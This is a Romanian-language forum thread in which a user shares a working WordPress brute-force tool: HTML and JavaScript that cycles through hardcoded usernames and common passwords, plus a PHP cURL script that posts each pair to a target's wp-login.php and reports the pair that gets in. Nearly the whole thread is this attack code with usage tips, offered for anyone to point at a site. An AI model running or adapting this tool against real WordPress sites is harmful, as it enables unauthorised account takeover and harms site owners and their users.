Wordpress burteforce

[dancezar]

Ieri seara am facut un wp-bruteforce simplu folosind Javascript si putin php(doar pentru cURL) si m-am gandit sa il impart cu voi:D.

index.html (asta face tot:) )

<label>Url:</label><input type="text" id="u" /><br>
<label>Single user:</label><input type="text" id="s" /><input type="checkbox" id="single" />
<input type="button" value="GO!" onclick="if(this.value=='GO!'){start();this.value='Stop';}else{work=0;this.value='GO!';}" />
<div id="st"></div>
<script>

var users=Array("admin"
,"user"
,"sysadmin"
,"system"
,"administrator"
,"blog"
,"webmaster"
);
var pass=Array("123456"
,"pa$$word"
,"admin"
,"admin123"
,"administrator"
,"qwerty"
,"qwerty1234"
,"andrei123"
);
var url=document.getElementById('u').value;
var sa=document.getElementById('st');
var single_user;
var contor_user;
var contor_pass;
var total_u;
var total_p;
var work;
var cont_incercari;
http=new XMLHttpRequest();
function start(){
single_user="-";
cont_incercari=0;
contor_user=0;
contor_pass=0;
total_u=users.length;
total_p=pass.length;
work=1;
if(document.getElementById('single').checked){
single_user=document.getElementById('s').value;
make_get(single_user,pass[0]);
}else{
make_get(users[0],pass[0]);
}
}
function make_get(user,pass){
http.open("GET", "get.php?url="+url+"&user="+user+"&pass="+pass, true);
http.overrideMimeType('text/html; charset=UTF-8');
http.onreadystatechange = function() {
if (http.readyState == 4) {
trateaza();
}
}
http.send(null);
}
function trateaza(){
sursa=http.responseText;
if(work==1){
if(sursa.search("<strong>ERROR</strong>")>-1){
        if(single_user!="-"){
		     if(contor_pass<total_p){
			 contor_pass++;
			 cont_incercari++;
			 			 sa.innerHTML="Incerc "+(cont_incercari+1)+"/"+total_p;
			 make_get(single_user,pass[contor_pass]);
			 }else{
               alert("Stop");
			   work=0;
			 }

		}else{
				   if(contor_pass<total_p){
				   contor_pass++;
				   cont_incercari++;
				   }else if(contor_user<total_u){
				   contor_pass=0;
				   contor_user++;
				   cont_incercari++;
				   }else{
				   alert("Stop");
				   work=0;
				   }
				   sa.innerHTML="Incerc "+(cont_incercari+1)+"/"+(total_p*total_u);
				   make_get(users[contor_user],pass[contor_pass]);
		}
}else{
//got him!!
alert(users[contor_user]+"::"+pass[contor_pass]);
}
}
}
</script>

get.php

<?php
$curl = curl_init($_REQUEST['url'].'/wp-login.php');
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_COOKIEJAR,"c.txt");
curl_setopt($curl,CURLOPT_COOKIEFILE,"c.txt");
curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
curl_setopt($curl,CURLOPT_POST,TRUE); 
curl_setopt($curl,CURLOPT_POSTFIELDS,"log=".$_REQUEST['user']."&pwd=".$_REQUEST['pass']."&wp-submit=Log+In&redirect_to=".$_REQUEST['url']."/wp-admin/&testcookie=0");
$a = curl_exec($curl);
echo $a;
?>

Pentru un anumit user completati Single user: si bifati casuta.

l-am testat pe firefox ultima versiune cred.

Seara buna.

Edited January 3, 2014 by danyweb09
Am scris burteforce in loc de bruteforce:))

[Htich]

.... Admin / 123456 ... asa da la toate ! un "README" pt. oameni slow on brain ... !

[dancezar]

.... Admin / 123456 ... asa da la toate ! un "README" pt. oameni slow on brain ... !

Url-urile trebuie sa vina sub forma http://site.com fara / dupa de aia nu a mers:)